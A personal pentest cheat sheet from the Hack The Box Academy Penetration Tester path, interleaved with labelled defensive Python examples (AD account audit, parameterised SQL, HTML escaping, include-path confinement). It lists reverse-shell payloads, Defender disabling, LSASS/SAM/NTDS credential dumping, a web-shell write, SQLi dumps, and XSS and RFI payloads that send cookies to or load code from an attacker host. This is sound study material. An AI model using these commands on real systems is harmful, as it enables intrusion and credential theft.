
Hack The Box Academy — Penetration Tester Job Role Path (Cheat-Sheet)


Overview

Between May and September 2025, I completed the Hack The Box Academy Penetration Tester Job Role Path in just under five months.
This structured learning path is designed to build both foundational and intermediate penetration testing skills, aligned with the real-world workflow of a professional pentester.

The path includes 28 modules, progressing from fundamental networking and web application concepts to more advanced exploitation, privilege escalation, and Active Directory attacks.
It closely follows the PTES methodology (Pre-engagement → Information Gathering → Vulnerability Assessment → Exploitation → Post-Exploitation → Reporting) and directly prepares students for the HTB Certified Penetration Testing Specialist (HTB CPTS) certification.


Objectives & Skills Covered

Throughout the path, I strengthened a wide range of technical and methodological skills, including:

  • ✅ Understanding the penetration testing process and methodology
  • 🌐 Conducting reconnaissance and footprinting using both passive and active techniques
  • 🧭 Performing network enumeration with tools such as Nmap and manual scanning
  • 🔍 Performing web application reconnaissance and analyzing HTTP requests/responses
  • 🧱 Identifying and exploiting common vulnerabilities in services and web apps
  • 💻 Executing Windows and Linux privilege escalation
  • 🔄 Performing pivoting and tunneling across segmented networks
  • 🧠 Building a solid understanding of Active Directory environments and attack vectors
  • 🧾 Documenting findings and writing professional pentest reports
  • 🧰 Using and combining key tools: nmap, curl, enum4linux, netcat, smbclient, sqlmap, hydra, chisel, and many others

About This Cheat Sheet

As I progressed through each module, I took extensive notes and collected the most useful commands, tips, and workflows.
This page serves as a centralized reference for:

🔹 Quickly recalling common pentesting commands
🔹 Revisiting useful techniques learned across the modules
🔹 Supporting future labs, writeups, and real-world engagements

Even beyond the Penetration Tester Path, this cheat sheet can be valuable for CTFs, home labs, and red/purple team exercises.


🧠 This post is not a tutorial or a walkthrough of the path, but a personal reference and summary of key tools and commands learned throughout the journey.


💡 This cheat sheet consolidates and expands on the individual command references and exercises from the official Hack The Box Academy modules within the Penetration Tester Job Role Path.
It serves as a unified, practical reference for quick recall during labs, reviews, or real-world engagements.

📚 Penetration Tester Path – Command Reference Cheat Sheet

This section summarizes the key commands and techniques I used throughout the HTB Academy Penetration Tester Job Role Path, organized by module.
Each command includes a short description to help quickly recall its purpose.


🧱 Fundamentals

🧭 Penetration Testing Process

Understand the overall methodology (no specific commands required here, mostly conceptual).

💻 Linux Fundamentals

pwd                      # Print working directory
ls -la                   # List files with details
cat /etc/passwd          # View user accounts
grep -R "pattern" /path  # Search recursively for a string
find / -type f -name "file.txt" 2>/dev/null  # Search files by name
chmod +x script.sh       # Add execute permissions

🪟 Windows Fundamentals

whoami                   # Current user
systeminfo               # System info
net user                 # List users
net localgroup administrators  # Check admin group
tasklist                 # Running processes

🌐 Introduction to Web Applications / Web Requests

curl -I http://target     # Send HEAD request
curl -v http://target     # Verbose request, show headers
wget http://target/file   # Download file

🌐 Network Enumeration with NMAP

💡 Scanning options

-sn                 # Disables port scanning (host discovery only)
-Pn                 # Skips host discovery (no ICMP echo requests) and treats all hosts as up
-PE                 # Performs the ping scan by using ICMP Echo Requests against the target
-p-                 # Scan all ports
-p21-443            # Scan all ports between 21 and 443
-p25,110,143        # Scans only the specified ports 25, 110 and 143
-F                  # Scans top 100 ports
-sS                 # Performs a TCP SYN scan
-sA                 # Performs a TCP ACK scan
-sU                 # Performs a UDP scan
-sV                 # Scans the discovered services for their versions
-sC                 # Performs a script scan with scripts that are categorized as "default"
--script <script>   # Performs a script scan using the specified scripts or categories (malware, vuln, exploit, discovery, fuzzer, ...)
-O                  # Performs an OS detection scan to determine the OS of the target
-A                  # Performs OS detection, service detection, and traceroute scans
-D RND:5            # Sets the number of random decoys that will be used to scan the target
-S 10.10.XXX.XXX    # Specifies the source IP address for the scan
--disable-arp-ping  # Disables ARP ping requests
--packet-trace      # Shows all packets sent and received

🌪️ Performance options

-T <0-5>            # Selects the timing template (0 = paranoid ... 5 = insane)
-v/-vv              # Displays verbose output during the scan
--min-rate <n>      # Sends packets no slower than <n> per second

🌍 Footprinting

👾 SMB

smbclient -N -L //<IP>                          # Null session authentication on SMB
smbclient //<IP>/<share>                        # Connect to a specific SMB share
rpcclient -U "" <IP>                            # Interaction with the target using RPC
smbmap -H <IP>                                  # Enumerating SMB shares
smbmap -H <IP> -r <share>                       # Recursive network share enumeration using smbmap
smbmap -H <IP> --download "share\file.txt"      # Download a specific file from the shared folder
crackmapexec smb <IP> --shares -u '' -p ''      # Enumerating SMB shares using null session authentication
enum4linux <IP> -A                              # SMB enumeration using enum4linux

💿 NFS

showmount -e <IP>                                      # Show available NFS shares
mount -t nfs <IP>:/<share> ./target-NFS/ -o nolock     # Mount the specific NFS share to ./target-NFS
umount ./target-NFS                                    # Unmount the specific NFS share

🌐 DNS

dig ns <domain.tld> @<nameserver>                                       # NS request to the specific nameserver
dig any <domain.tld> @<nameserver>                                      # ANY request to the specific nameserver
dig axfr <domain.tld> @<nameserver>                                     # AXFR request to the specific nameserver
dnsenum --dnsserver <nameserver> --enum -p 0 -s 0 -o found_subdomains.txt -f ~/subdomains.list <domain.tld>     # Subdomain brute forcing

📩 IMAP/POP3

curl -k 'imaps://<FQDN/IP>' --user <user>:<password>   # Log in to the IMAPS service using cURL
openssl s_client -connect <IP>:<imaps/pop3s>           # Connect to the IMAPS/POP3S service

💻 SNMP

snmpwalk -v2c -c <community string> <IP>    # Querying OIDs using snmpwalk
onesixtyone -c community-strings.list <IP>  # Bruteforcing community strings of the SNMP service
braa <community string>@<IP>:.1.*           # Bruteforcing SNMP service OIDs

🐬 MySQL

mysql -u <user> -p<password> -h <IP>   # Log in to the MySQL server

🖥️ MSSQL

mssqlclient.py <user>@<IP> -windows-auth  # Log in to the MSSQL server using Windows authentication

🛠️ Windows Remote Management

xfreerdp /u:<user> /p:"<password>" /v:<IP> /drive:shares,/tmp/shares    # Log in to the RDP server from Linux with a share folder
evil-winrm -i <IP> -u <user> -p <password>                              # Log in to the WinRM server
wmiexec.py <user>:"<password>"@<IP> "<system command>"                  # Execute command using the WMI service

✉️ File Transfers

Invoke-WebRequest -Uri https://<snip>/file.ps1 -OutFile file.ps1            # Download a file with PowerShell
IEX (New-Object Net.WebClient).DownloadString('https://<snip>/file.ps1')   # Execute a file in memory using PowerShell
certutil.exe -verifyctl -split -f http://<IP>/file.exe                      # Download a file using certutil
wget https://<snip>/file.sh -O /tmp/file.sh                                 # Download a file using wget
curl -o /tmp/file.sh https://<snip>/file.sh                                 # Download a file using cURL
scp C:\Temp\upload.zip user@<IP>:/tmp/uploaded.zip                          # Upload a file using SCP
scp user@<IP>:/tmp/download.exe C:\Temp\downloaded.exe                      # Download a file using SCP
python3 smbserver.py -smb2support <shareName> /home/<nameofuser>/Documents/ # Launches smbserver.py to host a share on the attacker Linux box for receiving files from the target

💣 Shells & Payloads

Set-MpPreference -DisableRealtimeMonitoring $true                                          # PowerShell command used to disable real-time monitoring in Windows Defender
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > nameoffile.elf    # MSFvenom command used to generate a Linux-based stageless reverse shell payload
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > nameoffile.exe      # MSFvenom command used to generate a Windows-based stageless reverse shell payload
python3 -c 'import pty; pty.spawn("/bin/bash")'                                            # Upgrade shell
/bin/sh -i                                                                                 # Spawns an interactive shell on a Linux-based system
perl -e 'exec "/bin/sh";'                                                                  # Uses Perl to spawn an interactive shell on a Linux-based system
ruby: exec "/bin/sh"                                                                       # Uses Ruby to spawn an interactive shell on a Linux-based system
Lua: os.execute('/bin/sh')                                                                 # Uses Lua to spawn an interactive shell on a Linux-based system
awk 'BEGIN {system("/bin/sh")}'                                                            # Uses awk to spawn an interactive shell on a Linux-based system
vim -c ':!/bin/sh'                                                                         # Uses the text editor Vim to spawn an interactive shell. Can be used to escape "jail shells"

💥 Password attacks

🧾 Password mutations & custom wordlists

cewl https://<snip>.com -d 1 -m 3 --lowercase -w custom.wordlist            # Uses CeWL to generate a wordlist based on keywords present on a website
hashcat --force custom.wordlist -r custom.rule --stdout > mut_password.list # Uses Hashcat to generate a rule-based wordlist
./username-anarchy -i /path/to/listoffirstandlastnames.txt                  # Uses the username-anarchy tool with a pre-made list of first and last names to generate a list of potential usernames

🔐 Remote Password Attacks

netexec winrm <ip> -u user.list -p password.list                            # Uses NetExec over WinRM to brute force the specified usernames and passwords against a target
netexec smb <ip> -u "user" -p "password" --shares                           # Uses NetExec to enumerate SMB shares on a target using a specified set of credentials
netexec smb <ip> --local-auth -u <username> -p <password> --sam             # Uses NetExec with admin credentials to dump password hashes stored in the SAM over the network
netexec smb <ip> --local-auth -u <username> -p <password> --lsa             # Uses NetExec with admin credentials to dump LSA secrets over the network. It is possible to get clear-text credentials this way
netexec smb <ip> -u <username> -p <password> --ntds                         # Uses NetExec with admin credentials to dump hashes from the NTDS file over the network
./Pcredz -f demo.pcapng -t -v                                               # Extract credentials from a network packet capture

💻 Windows Local Password Attacks

findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml           # Search for the string "password" in many different file types
Get-Process lsass                                                                       # Shows LSASS process details (including its PID) in PowerShell, useful for preparing an LSASS memory dump
rundll32 C:\windows\system32\comsvcs.dll, MiniDump 346 C:\lsass.dmp full                # Uses rundll32 in Windows to create an LSASS memory dump file (346 is the LSASS PID). This file can then be transferred to an attack box to extract credentials
pypykatz lsa minidump /path/to/lsassdumpfile                                            # Uses pypykatz to parse and attempt to extract credentials & password hashes from an LSASS process memory dump file
reg.exe save hklm\sam C:\sam.save                                                       # Uses reg.exe in Windows to save a copy of a registry hive at a specified location on the file system. It can be used to make copies of any registry hive (i.e., hklm\sam, hklm\security, hklm\system)
python3 secretsdump.py -sam sam.save -security security.save -system system.save LOCAL  # Uses secretsdump.py to dump password hashes from the SAM database
vssadmin CREATE SHADOW /For=C:                                                          # Uses the Windows command line tool vssadmin to create a volume shadow copy for C:. This can be used to make a copy of NTDS.dit safely
cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit   # Uses the Windows copy command to create a copy of NTDS.dit from a volume shadow copy of C:
cmdkey /list                                                                            # Enumerate credentials stored in the current user's profile
runas /savecred /user:<username> cmd                                                    # Launch a new instance of cmd.exe while impersonating a stored user
snaffler.exe -s                                                                         # Search network shares for interesting files and credentials

🔍 Cracking Passwords

hashcat -m 1000 dumpedhashes.txt /usr/share/wordlists/rockyou.txt   # Uses Hashcat to crack NTLM hashes using a specified wordlist
unshadow /tmp/passwd.bak /tmp/shadow.bak > /tmp/unshadowed.hashes   # Uses unshadow to combine data from passwd.bak and shadow.bak into one single file to prepare for cracking
zip2john ZIP.zip > zip.hash                                         # Runs zip2john against a zip file to generate a hash and writes that hash to a file called zip.hash

🔄 Pivoting

ssh -D 9050 user@<DMZ01>                                # Creates a local SOCKS proxy (localhost:9050) via SSH to DMZ01
sudo vim /etc/proxychains.conf                          # Open the ProxyChains config in vim and ensure "socks4 127.0.0.1 9050" is listed under [ProxyList]
sudo proxychains -q nmap -sT -Pn 172.16.119.13 --open   # Performs an Nmap TCP connect scan (-sT) routed through ProxyChains via the SOCKS proxy for internal reconnaissance


🌐 Attacking Common Services

📁 Attacking FTP

ftp <IP>                                                        # Connects to an FTP server using the ftp client, supports anonymous logon or authenticated access.
hydra -l user1 -P /usr/share/wordlists/rockyou.txt ftp://<IP>  # Brute-forcing the FTP service

👾 SMB

crackmapexec smb <IP> -u /tmp/userlist.txt -p <password>                                # Password spraying against different users from a list
impacket-psexec <username>:'<password>'@<IP>                                            # Connect to the SMB service using impacket-psexec
crackmapexec smb <IP> -u <username> -p '<password>' -x 'whoami' --exec-method smbexec   # Execute a command over the SMB service using crackmapexec
crackmapexec smb <IP> -u <username> -p '<password>' --sam                               # Extract hashes from the SAM database
crackmapexec smb <IP> -u <username> -H <hash>                                           # Use the pass-the-hash technique to authenticate on the target host
impacket-ntlmrelayx --no-http-server -smb2support -t <IP>                               # Dump the SAM database using impacket-ntlmrelayx
impacket-ntlmrelayx --no-http-server -smb2support -t <IP> -c 'powershell -e <base64 reverse shell>'   # Execute a PowerShell-based reverse shell using impacket-ntlmrelayx

💾 Attacking SQL Databases

sqlcmd> EXECUTE sp_configure 'show advanced options', 1   # Allow advanced options to be changed
sqlcmd> EXECUTE sp_configure 'xp_cmdshell', 1             # Enable xp_cmdshell
sqlcmd> RECONFIGURE                                       # Run after each sp_configure command to apply the changes
sqlcmd> xp_cmdshell 'whoami'                              # Execute a system command from the MSSQL server
mysql> SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php'   # Create a file using MySQL
mysql> show variables like "secure_file_priv";            # Check whether secure_file_priv is empty, which allows reading locally stored files on the system
sqlcmd> SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents   # Read local files in MSSQL
mysql> select LOAD_FILE("/etc/passwd");                   # Read local files in MySQL
sqlcmd> SELECT srvname, isremote FROM sysservers          # Identify linked servers in MSSQL
sqlcmd> EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [<linked server>]   # Identify the user and its privileges used for the remote connection in MSSQL

🛠️ Attacking RDP

crowbar -b rdp -s <IP>/32 -U users.txt -c '<password>'  # Password spraying against the RDP service
hydra -L usernames.txt -p '<password>' <IP> rdp         # Brute-forcing the RDP service
tscon <TARGET_SESSION_ID> /dest:<OUR_SESSION_NAME>      # Impersonate a user's session without their password
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f  # Enable "Restricted Admin Mode" on the target Windows host

🌐 Attacking DNS

dig AXFR @<nameserver> <domain.tld>   # Attempts an AXFR zone transfer from a specified nameserver
subfinder -d <domain.tld> -v          # Subdomain enumeration using passive sources

📧 Attacking Email Services

host -t MX <domain.tld>                                          # DNS lookup for the mail servers of the specified domain
telnet <IP> 25                                                   # Connect to the SMTP server
smtp-user-enum -M RCPT -U userlist.txt -D <domain.tld> -t <IP>   # SMTP user enumeration using the RCPT command against the specified host
python3 o365spray.py --validate --domain <domain.tld>            # Verify whether the specified domain uses Office 365

🔄 Pivoting, Tunneling, and Port Forwarding

ssh -L 1234:localhost:3306 <username>@<IP>                            # Creates an SSH tunnel forwarding local port 1234 to remote localhost:3306 via <username>@<IP>
ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:80 <username>@<IP> -vN    # Creates a reverse SSH tunnel: connections to <InternalIPofPivotHost>:8080 on the pivot host are forwarded to port 80 on the attack host
msf6> run post/multi/gather/ping_sweep RHOSTS=<IP>/<CIDR>             # Metasploit command that runs a ping sweep module against the specified network segment
for i in {1..254} ;do (ping -c 1 XXX.XXX.XXX.$i | grep "bytes from" &) ;done   # For loop used on Linux to discover hosts in a given network segment
for /L %i in (1 1 254) do ping XXX.XXX.XXX.%i -n 1 -w 100 | find "Reply"       # For loop used on Windows to discover hosts in a given network segment
1..254 | % {"172.16.5.$($_): $(Test-Connection -count 1 -comp 172.16.5.$($_) -quiet)"}   # PowerShell one-liner used to ping addresses 1 - 254 in the specified network segment

🛡️Active Directory Enumeration & Attacks

🔍 Initial Enumeration

fping -asgq <IP>/<CIDR>             # Performs a ping sweep on the specified network segment from a Linux-based host
sudo responder -I <interface> -A    # Launches Responder in analyze mode on a specified network interface
./kerbrute_linux_amd64 userenum -d <DOMAIN> --dc <IP_DC> usernames.txt # Runs the Kerbrute tool to discover usernames in the domain specified

☠️ LLMNR/NBT-NS Poisoning

Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y # Starts Inveigh on a Windows based host with LLMNR & NBNS spoofing enabled and outputs the results to a file

💣 Kerberoasting

GetUserSPNs.py -dc-ip <IP_DC> <DOMAIN>/<username>                              # Impacket tool used to get a list of SPNs on the target Windows domain from a Linux-based host
GetUserSPNs.py -dc-ip <IP_DC> <DOMAIN>/<username> -request                     # Impacket tool used to request (-request) all TGS tickets for offline processing from a Linux-based host
GetUserSPNs.py -dc-ip <IP_DC> <DOMAIN>/<username> -request-user <target_user>  # Impacket tool used to request (-request-user) a TGS ticket for a specific user account from a Linux-based host
setspn.exe -Q */*                                                              # Used to enumerate SPNs in a target Windows domain from a Windows-based host
Import-Module .\PowerView.ps1; Get-DomainUser * -spn | select samaccountname   # Uses PowerView to list the accounts that have an SPN set (Kerberoasting candidates)
.\Rubeus.exe kerberoast /user:<username> /nowrap                               # Used to request a TGS ticket for a specific user, then formats the output in an easy to view & crack manner (/nowrap)

💥 AS-REP Roasting

Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl   # PowerView command used to search for the DONT_REQ_PREAUTH value across user accounts in a target Windows domain
.\Rubeus.exe asreproast /user:<username> /nowrap /format:hashcat                                     # Uses Rubeus to perform an AS-REP Roasting attack and formats the output for Hashcat
kerbrute userenum -d <DOMAIN> --dc <IP_DC> usernames.txt                                             # Enumerates domain users and identifies accounts without Kerberos pre-auth
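The PowerView, Rubeus and kerbrute commands above hunt for two account properties that a defender should be auditing on a schedule as well: DONT_REQ_PREAUTH in userAccountControl (AS-REP roastable) and an SPN on an ordinary user account (Kerberoastable). The Python below is an added example, not part of this cheat sheet or of any HTB tool. It runs those checks over a constructed list of account records shaped like LDAP attributes; the account names, domain and the msDS-SupportedEncryptionTypes handling are assumptions for the demo.

```python
# Added example, not from the HTB cheat sheet: audit constructed AD account
# records for the properties the Kerberoasting / AS-REP Roasting commands
# above look for. Record shape mimics LDAP attribute names; values are made up.

# userAccountControl bit flags (documented Microsoft values)
UF_ACCOUNTDISABLE = 0x0002
UF_DONT_REQUIRE_PREAUTH = 0x400000

# msDS-SupportedEncryptionTypes bits: 0x4 = RC4-HMAC, 0x8 = AES128, 0x10 = AES256
ENC_AES = 0x8 | 0x10

# Constructed sample records (not real accounts); corp.example is a placeholder domain
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "krbtgt", "userAccountControl": 0x202,
     "servicePrincipalName": ["kadmin/changepw"]},
    {"sAMAccountName": "svc_sql", "userAccountControl": 0x10200,
     "servicePrincipalName": ["MSSQLSvc/db01.corp.example:1433"],
     "msDS-SupportedEncryptionTypes": 0},
    {"sAMAccountName": "svc_web", "userAccountControl": 0x10200,
     "servicePrincipalName": ["HTTP/web01.corp.example"],
     "msDS-SupportedEncryptionTypes": 0x18},
    {"sAMAccountName": "legacy_app", "userAccountControl": 0x400200},
    {"sAMAccountName": "old_vendor", "userAccountControl": 0x400202},   # disabled
    {"sAMAccountName": "DB01$", "userAccountControl": 0x1000,
     "servicePrincipalName": ["HOST/DB01"]},
    {"sAMAccountName": "jdoe", "userAccountControl": 0x10200},
]


def audit_accounts(records):
    """Return (account, finding) pairs for enabled accounts with risky Kerberos settings."""
    findings = []
    for rec in records:
        name = rec["sAMAccountName"]
        uac = int(rec.get("userAccountControl", 0))
        if uac & UF_ACCOUNTDISABLE:
            continue  # a disabled account cannot be roasted; skip the noise
        if uac & UF_DONT_REQUIRE_PREAUTH:
            findings.append((name, "AS-REP roastable: DONT_REQ_PREAUTH is set"))
        spns = rec.get("servicePrincipalName", [])
        # Machine accounts (trailing $) hold SPNs by design and have long random
        # passwords; a human-managed user account with an SPN is the real finding.
        if spns and not name.endswith("$"):
            findings.append((name, "Kerberoastable: user account holds SPN " + spns[0]))
            enc = int(rec.get("msDS-SupportedEncryptionTypes", 0))
            if not enc & ENC_AES:
                findings.append((name, "Kerberoast tickets will use RC4: no AES in msDS-SupportedEncryptionTypes"))
    return findings


if __name__ == "__main__":
    for account, finding in audit_accounts(SAMPLE_ACCOUNTS):
        print(f"{account:<12} {finding}")
```

In a real environment the records come from an LDAP query (the same one Get-DomainUser performs); the remediation for each finding is the inverse of the attack: clear DONT_REQ_PREAUTH, move the service to a group Managed Service Account, and enable AES on the account.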

☁️ FFUF

ffuf -h # ffuf help
ffuf -w wordlist.txt:FUZZ -u http://<IP>:<PORT>/FUZZ        # Directory Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://<IP>:<PORT>/indexFUZZ   # Extension Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://<IP>:<PORT>/blog/FUZZ.php   # Page Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://<IP>:<PORT>/FUZZ -recursion -recursion-depth 1 -e .php -v   # Recursive Fuzzing
ffuf -w wordlist.txt:FUZZ -u https://FUZZ.<domain.tld>/     # Sub-domain Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://<domain.tld>:<PORT>/ -H 'Host: FUZZ.<domain.tld>' -fs xxx   # VHost Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://<domain.tld>:<PORT>/<snip>/index.php?FUZZ=key -fs xxx   # Parameter Fuzzing - GET
ffuf -w wordlist.txt:FUZZ -u http://<domain.tld>:<PORT>/<snip>/index.php -X POST -d 'FUZZ=key' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx # Parameter Fuzzing - POST

💉 SQL Injection Fundamentals

💉 SQLi

admin' or '1'='1    # Basic Auth Bypass
admin')-- -         # Basic Auth Bypass With comments
' order by 1-- -    # Detect number of columns using order by
admin' UNION select 1,2,3-- -   # Detect number of columns using Union injection
admin' UNION select 1,@@version,3,4-- - # Basic Union injection
UNION select username, 2, 3, 4 from passwords-- - # Union injection for 4 columns

🔍 DB enumeration

admin' UNION select 1,database(),2,3-- -    # Current database name
admin' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -  # List all databases

💥 Payload

admin' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- - # List all tables in a specific database
admin' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- - # List all columns in a specific table
admin' UNION select 1, username, password, 4 from dev.credentials-- -   # Dump data from a table in another database

🧠 Privileges

cn' UNION SELECT 1, user(), 3, 4-- -    # Find current user
cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user='<username>'-- -   # Find if user has admin privileges
cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -    # Find which directories can be accessed through MySQL
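The auth-bypass and UNION payloads in the SQLi lists above only work because user input is concatenated into the query text. The Python below is an added example, not code from the cheat sheet or the HTB labs: it builds the same login check two ways against an in-memory SQLite database (standing in for MySQL; the schema, rows and table names are constructed) and runs the page's two payload shapes against both, so the parameterised version can be seen to treat the payload as a plain string.

```python
# Added example, not from the HTB cheat sheet: the same login query written
# with string concatenation and with bound parameters. SQLite stands in for
# MySQL; schema, rows and payloads are constructed for the demo.
import sqlite3

PAYLOAD_BYPASS = "admin' or '1'='1"                                   # from the SQLi list above
PAYLOAD_UNION = "x' UNION SELECT 1, username, password FROM passwords-- -"   # UNION shape from the list above


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'correct-horse');
        CREATE TABLE passwords (id INTEGER, username TEXT, password TEXT);
        INSERT INTO passwords VALUES (1, 'svc_backup', 'Winter2025!');
    """)
    return conn


def login_vulnerable(conn, username, password):
    """String concatenation: the user's text becomes part of the SQL grammar."""
    query = ("SELECT id, username, password FROM users WHERE username = '"
             + username + "' AND password = '" + password + "'")
    return conn.execute(query).fetchall()


def login_hardened(conn, username, password):
    """Bound parameters: the driver sends the values separately, so quotes,
    OR and UNION inside them are compared as characters, never parsed."""
    query = "SELECT id, username, password FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable / bypass :", login_vulnerable(db, PAYLOAD_BYPASS, "wrong"))
    print("vulnerable / union  :", login_vulnerable(db, PAYLOAD_UNION, "wrong"))
    print("hardened   / bypass :", login_hardened(db, PAYLOAD_BYPASS, "wrong"))
    print("hardened   / union  :", login_hardened(db, PAYLOAD_UNION, "wrong"))
    print("hardened   / real   :", login_hardened(db, "admin", "correct-horse"))
```

The bypass works because AND binds tighter than OR, so `username = 'admin' OR ('1'='1' AND password = 'wrong')` is true for the admin row; the UNION payload works because the injected SELECT has the same three columns as the original and `-- -` comments out the trailing password clause. Neither reaches the parser in the hardened version.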

❌ Cross-Site Scripting (XSS)

<script>alert(window.origin)</script>       # Basic XSS Payload
<img src="" onerror=alert(window.origin)>   # HTML-based XSS Payload
<script src="http://<OUR_IP>/script.js"></script>   # Load remote script
<script>new Image().src='http://<OUR_IP>/index.php?c='+document.cookie</script> # Send Cookie details to us
python xsstrike.py -u "http://<IP>:<PORT>/index.php?task=test"  #  Run xsstrike on a url parameter
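Every payload in the XSS list above depends on the application writing user input into the page without encoding it for the context it lands in. The Python below is an added example, not code from the cheat sheet: it renders a constructed profile fragment with and without output encoding (HTML body and quoted attribute contexts) and checks whether the page's payload shapes survive as markup. The template strings and the 203.0.113.5 address are made up for the demo.

```python
# Added example, not from the HTB cheat sheet: the same HTML fragment rendered
# with and without output encoding, exercised with the XSS payload shapes
# listed above. Template strings and the callback address are constructed.
import html

XSS_PAYLOADS = [
    "<script>alert(window.origin)</script>",
    '<img src="" onerror=alert(window.origin)>',
    '<script src="http://203.0.113.5/script.js"></script>',
    "<script>new Image().src='http://203.0.113.5/index.php?c='+document.cookie</script>",
]


def render_vulnerable(display_name):
    """Reflects the value straight into the HTML body: the browser parses the payload as markup."""
    return "<p>Welcome back, " + display_name + "</p>"


def render_hardened(display_name):
    """HTML-body context: encode & < > " ' so the value is displayed as text, never parsed."""
    return "<p>Welcome back, " + html.escape(display_name, quote=True) + "</p>"


def render_attribute_hardened(display_name):
    """Quoted-attribute context: the same encoding stops the input from closing the quote
    and adding its own on* handler attribute."""
    return ('<input type="text" name="display_name" value="'
            + html.escape(display_name, quote=True) + '">')


def payload_survives(rendered, payload):
    """True when the raw payload text is still present verbatim in the output."""
    return payload in rendered


if __name__ == "__main__":
    for p in XSS_PAYLOADS:
        print("vulnerable:", payload_survives(render_vulnerable(p), p),
              "| hardened:", payload_survives(render_hardened(p), p))
    print(render_attribute_hardened('" onfocus=alert(1) x="'))
```

Encoding is context-specific: the same value placed inside a `<script>` block or a URL needs JavaScript or URL encoding instead, which is why template engines with auto-escaping are preferred over hand-built strings. The cookie-stealing payload above is additionally blunted by the HttpOnly cookie attribute, which keeps the session cookie out of document.cookie.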

📁 Local File Inclusion (LFI)

/index.php?language=/etc/passwd   # Basic LFI
/index.php?language=../../../../etc/passwd   # LFI with path traversal
/index.php?language=....//....//....//....//etc/passwd   # Bypass a basic filter that strips "../" only once
/index.php?language=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64   # Bypass filters with URL encoding
/index.php?language=php://filter/read=convert.base64-encode/resource=config   # Read PHP source with the base64 filter
/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id   # RCE with the data wrapper
curl -s "http://<IP>:<PORT>/index.php?language=expect://id"   # RCE with the expect wrapper
/index.php?language=http://<OUR_IP>:<PORT>/shell.php&cmd=id   # Include a remote PHP web shell (RFI)
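The LFI list above shows a `language` parameter that is fed to a file include. The Python below is an added example, not from the cheat sheet or any HTB lab code: it contrasts the naive "strip ../" filter that the `....//` payload defeats with canonicalisation plus confinement to a base directory, and puts an allow-list in front of both. The base directory, the allow-list and the 203.0.113.5 address are constructed for the demo; the payloads are the shapes listed above as the application would receive them.

```python
# Added example, not from the HTB cheat sheet: resolving a user-controlled
# include parameter safely. BASE_DIR, the allow-list and the remote address are
# constructed for the demo; the payloads are the shapes listed above.
import os
from urllib.parse import unquote

BASE_DIR = os.path.realpath("/var/www/html/languages")   # constructed web-root subdirectory
ALLOWED_LANGUAGES = {"en", "de", "fr"}                   # constructed allow-list

LFI_PAYLOADS = [
    "/etc/passwd",
    "../../../../etc/passwd",
    "....//....//....//....//etc/passwd",
    "%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64",
    "php://filter/read=convert.base64-encode/resource=config",
    "data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D",
    "expect://id",
    "http://203.0.113.5:8000/shell.php",
]


def naive_strip(value):
    """The kind of filter the '....//' payload defeats: removes '../' once, not recursively."""
    return value.replace("../", "")


def confine_to_base(value, base_dir=BASE_DIR):
    """Canonicalise the requested file; reject stream wrappers, NUL bytes and anything
    whose real path is outside base_dir. Returns the absolute path or None."""
    decoded = unquote(unquote(value))      # tolerate single and double URL encoding
    if "://" in decoded or "\x00" in decoded:
        return None                        # php://, data://, expect://, http:// ...
    candidate = os.path.realpath(os.path.join(base_dir, decoded + ".php"))
    if os.path.commonpath([candidate, base_dir]) != base_dir:
        return None                        # escaped via '../' or an absolute path
    return candidate


def resolve_include(value, base_dir=BASE_DIR):
    """Allow-list first, path confinement second; returns the path to include or None."""
    decoded = unquote(unquote(value))
    if decoded not in ALLOWED_LANGUAGES:
        return None
    return confine_to_base(decoded, base_dir)


if __name__ == "__main__":
    print("naive filter leaves:", naive_strip("....//....//etc/passwd"))
    for p in LFI_PAYLOADS:
        print(f"{p[:45]:<45} confine={confine_to_base(p)!s:<50} resolve={resolve_include(p)}")
    print("en ->", resolve_include("en"))
```

Note what each layer catches: confinement alone still lets the `....//` payload through as a harmless path under the base directory (the file simply does not exist), while the traversal, absolute-path and wrapper payloads are rejected outright; the allow-list then removes the question of arbitrary file names altogether.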


💉 Command Injection

Injection Operator   Injection Character   URL-Encoded Character
Semicolon            ;                     %3b
New Line             \n                    %0a
Background           &                     %26
